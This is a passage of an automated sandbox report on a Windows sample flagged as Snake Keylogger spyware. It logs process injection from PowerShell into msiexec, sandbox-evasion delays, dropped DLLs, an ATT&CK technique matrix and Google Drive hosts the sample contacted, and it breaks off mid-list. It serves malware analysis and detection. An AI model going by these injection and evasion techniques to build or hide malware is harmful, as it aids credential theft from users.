      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6268Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3485Jump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dllJump to dropped file
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4536Thread sleep time: -130000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_00406232 FindFirstFileA,FindClose,0_2_00406232
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004056F7
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile opened: C:\Users\userJump to behavior
      Source: msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
      Source: msiexec.exe, 00000005.00000003.2502788314.00000000061CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061D0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeAPI call chain: ExitProcess graph end nodegraph_0-3602
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeAPI call chain: ExitProcess graph end nodegraph_0-3606
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0758D55C LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_0758D55C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 37E0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      1
      Masquerading
      OS Credential Dumping111
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts2
      PowerShell
      Boot or Logon Initialization Scripts311
      Process Injection
      31
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets3
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials14
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      AwMu7gR48D.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
      AwMu7gR48D.exe100%AviraTR/Injector.qhjhe
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe100%AviraTR/Injector.qhjhe
      C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll0%ReversingLabs
      C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.1
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://drive.google.com/GTmsiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055895124.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000433633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027572606.0000000006259000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://drive.usercontent.google.com/bmsiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://drive.usercontent.google.com/msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.microsoft.powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorAwMu7gR48D.exe, AwMu7gR48D.exe.2.drfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/iemsiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/(gvmsiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.commsiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/bemsiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorAwMu7gR48D.exe, AwMu7gR48D.exe.2.drfalse
                                            high
                                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.google.com/msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/Umsiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/ertificatesmsiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/Smsiexec.exe, 00000005.00000003.2111145432.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://drive.google.com/nmsiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 